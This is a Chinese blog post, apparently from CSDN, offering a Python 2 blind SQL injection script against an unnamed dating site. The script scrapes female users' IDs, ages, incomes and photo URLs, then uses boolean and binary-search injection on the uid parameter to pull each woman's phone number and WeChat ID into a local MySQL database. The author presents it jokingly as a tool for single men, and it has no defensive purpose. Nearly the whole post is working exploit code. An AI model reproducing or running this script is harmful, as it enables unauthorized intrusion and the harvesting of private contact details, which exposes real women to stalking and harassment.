python mysql盲注脚本

某相亲网漏洞,可盲注获得手机号和微信号。
功能1:爬取所有女性ID、年龄、月薪、照片URL
功能2:通过盲注方式获取对应ID的手机号和微信号
功能3:所有数据自动导入MYSQL
缺点:单线程
这个代码写得好心酸。。单身狗必备


# -*- coding: utf-8 -*-
# @Time    : 2018-7-24 13:13
# @Author  : meinaozi
# @File    : hehe.py
# @Software: PyCharm
# @Ver     : Python2.7

import sys, requests, json
import MySQLdb
from math import ceil

if sys.getdefaultencoding() != 'utf-8':
    reload(sys)
    sys.setdefaultencoding('utf-8')


def get_data(url):
    res = requests.get(url, headers=headers)
    return res.text


headers = {
    'UserAgent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15G77 MicroMessenger/6.7.1 NetType/WIFI Language/zh_CN',
    'Referer': 'https://www.*******.com/******/plugin.php?id=*******&mod=*******&pid=1000****&from=singlemessage&isappinstalled=0',
    'Cookie': '***********************************'
}


def get_tel_len(uid):
    for k in range(10, 13):
        URL1 = "https://www.*******.com/******/plugin.php?id=******&mod=visiting_card&pid=1000*****"
        URL2 = URL1 + "&uid=" + uid + " and length(tel)=" + str(k) + "-- a&Submit=Submit"
        if get_data(URL2).find("&uid=" + uid) > 1:
            data_len = k
            break
    print "Telphone length is : %s" % data_len
    return data_len


def get_wx_len(uid):
    for k in range(6, 21):
        URL1 = "https://www.*******.com/******/plugin.php?id=********&mod=visiting_card&pid=1000******"
        URL2 = URL1 + "&uid=" + uid + " and length(wx)=" + str(k) + "-- a&Submit=Submit"
        if get_data(URL2).find("&uid=" + uid) > 1:
            data_len = k
            break
    print "wecat length is : %s" % data_len
    return data_len


def get_tel(uid, data_len):
    URL1 = "https://www.********.com/*****/plugin.php?id=**********&mod=visiting_card&pid=1000*******"
    payload_num = "0123456789"
    tel = ""
    for j in range(1, data_len + 1):
        for l in payload_num:
            URL3 = URL1 + "&uid=" + uid + " and substr(LOWER(tel)," + str(j) + ",1)='" + l + "'-- a&Submit=Submit"
            if get_data(URL3).find("&uid=" + uid) > 1:
                tel = tel + l
                break
    print "Telphone is : %s" % tel
    return tel


def get_wx(uid, data_len):
    URL1 = "https://www.********.com/*****/plugin.php?id=**********&mod=visiting_card&pid=1000*****"
    payload_num = "abcdefjhijklmnopqrstuvwxyz0123456789_-"
    tel = ""
    for j in range(1, data_len + 1):
        for l in payload_num:
            URL3 = URL1 + "&uid=" + uid + " and substr(LOWER(wx)," + str(j) + ",1)='" + l + "'-- a&Submit=Submit"
            if get_data(URL3).find("&uid=" + uid) > 1:
                tel = tel + l
                break
    print "wecat is : %s " % tel
    return tel

def charge(mid, i):  # 判断大小
    global uid
    ur = "https://www.********.com/*****/plugin.php?id=*******&mod=visiting_card&pid=100********"
    url = ur + "&uid=%s and ascii(substr(wx,%s,1))<=%s-- a&Submit=Submit" % (uid,i,mid)
    #
    # print url
    # sys.exit()
    s = requests.get(url=url,headers=headers)
    content = s.content
    # print content
    # sys.exit()
    # print length
    if content.find("&uid=" + uid) > 10:
        return 1
    else:
        return 0

def dichotomie(l, r, i):  # 利用二分法查找
    mid = (l + r) / 2
    # print "l and r ,mid:",l,r,mid
    if l == r:
        global string
        string += chr(r)
        print string
        return 0
    if charge(mid, i):  # <=
        # print 0
        dichotomie(l, mid, i)
    else:
        # print 1
        dichotomie(int(ceil((l + r) * 1.0 / 2)), r, i)

def get_public_data(page):
    URL1 = "https://api.********.cn/*****/plugin.php?id=*****_zhaopin&mod=*******&openid=******************&uid=********&usersex=1&pid=100********&type=ajax&open_province_id=420&action=&search=&sex=12&typeFrom=&age=20&height=30&income=40&xueli=50&province_id=&city_id=&page=%s" % page
    ret = json.loads(get_data(URL1))
    return ret


def insert_user(uid, nickname, age, yx, pic1, pic2, pic3, pic4, pic5, tel, wx, hide):
    global db
    cursor = db.cursor()
    sql = "INSERT INTO user(uid,nickname,age,yx,pic1,pic2,pic3,pic4,pic5,tel,wx,hide) VALUES ('%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s')" % (
        uid, nickname, age, yx, pic1, pic2, pic3, pic4, pic5, tel, wx, hide)
    try:
        cursor.execute(sql)
        db.commit()
        return True
    except Exception, e:
        db.rollback()
        print e
        # return False


def select_data(sql, mode="single"):
    global db
    cursor = db.cursor()
    cursor.execute(sql)
    if mode == 'single':
        return cursor.fetchone()
    elif mode == 'update':
        db.commit()
        return True
    else:
        return cursor.fetchall()


def close_db():
    global db
    if db:
        db.close()


if __name__ == '__main__':
    while True:
        action = raw_input("请选择模式:[1]拉取最新信息 [2]输入uid查询手机号码和微信\r\n".decode('utf-8').encode('gbk'))
        if action and action in ("1", "2"):
            break
        else:
            print "输入错误\r\n".decode('utf-8').encode('gbk')

    if action == "1":
        try:
            db = MySQLdb.connect("localhost", "root", "123456", "xq",
                                 charset='utf8')
        except Exception, e:
            print e
        z = 0
        for i in range(1, 13):
            ret = get_public_data(i)
            if ret['code'] == u'200':
                for j in range(len(ret['data'])):
                    uid = ret['data'][j]['id']
                    nickname = ret['data'][j]['nickname']
                    age = ret['data'][j]['age']
                    yx = ret['data'][j]['yx']
                    pic1 = ""
                    if (len(ret['data'][j]['picurl1']) > 1): pic1 = ret['data'][j]['picurl1']
                    pic2 = ""
                    if (len(ret['data'][j]['picurl2']) > 1): pic2 = ret['data'][j]['picurl2']
                    pic3 = ""
                    if (len(ret['data'][j]['picurl3']) > 1): pic3 = ret['data'][j]['picurl3']
                    pic4 = ""
                    if (len(ret['data'][j]['picurl4']) > 1): pic4 = ret['data'][j]['picurl4']
                    pic5 = ""
                    if (len(ret['data'][j]['picurl5']) > 1): pic5 = ret['data'][j]['picurl5']
                    tel = ""
                    wx = ""
                    hide = 0
                    SQLret = select_data("select uid from `user` where uid='%s'" % uid, "single")
                    if not SQLret:
                        if insert_user(uid, nickname, age, yx, pic1, pic2, pic3, pic4, pic5, tel, wx, hide):
                             z = z + 1

        print "insert count: %s line" % z
        close_db()
    elif action == "2" :
        while True:
            uid = raw_input("请输入uid\r\n".decode('utf-8').encode('gbk'))
            if uid and uid.isdigit():
                break
            else:
                print "输入错误\r\n".decode('utf-8').encode('gbk')
        try:
            db = MySQLdb.connect("localhost", "root", "123456", "xq",
                                 charset='utf8')
        except Exception, e:
            print e
        # print get_public_data(11)
        # get_public_data(11)['code'] == 200
        SQLret = select_data("select uid from `user` where uid='%s'" % uid, "single")
        if not SQLret:
            print "can't find this uid in mysql"
            sys.exit()

        tel_len = get_tel_len(uid)
        #tel_len = 11
        tel = get_tel(uid, tel_len)

        SQLret = select_data("update `user` set tel='%s' where uid='%s'" % (tel,uid) ,"update")
        if SQLret:
            print "tel update ok!"

        string = ""
        wx_len = get_wx_len(uid)
        for i in range(1, wx_len + 1):  # range第二个参数是字段长度
            dichotomie(44, 123, i)
        print string
        #wx = get_wx(uid, wx_len)
        SQLret = select_data("update `user` set wx='%s' where uid='%s'" % (string,uid) ,"update")
        if SQLret:
            print "wx update ok!"
        close_db()
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值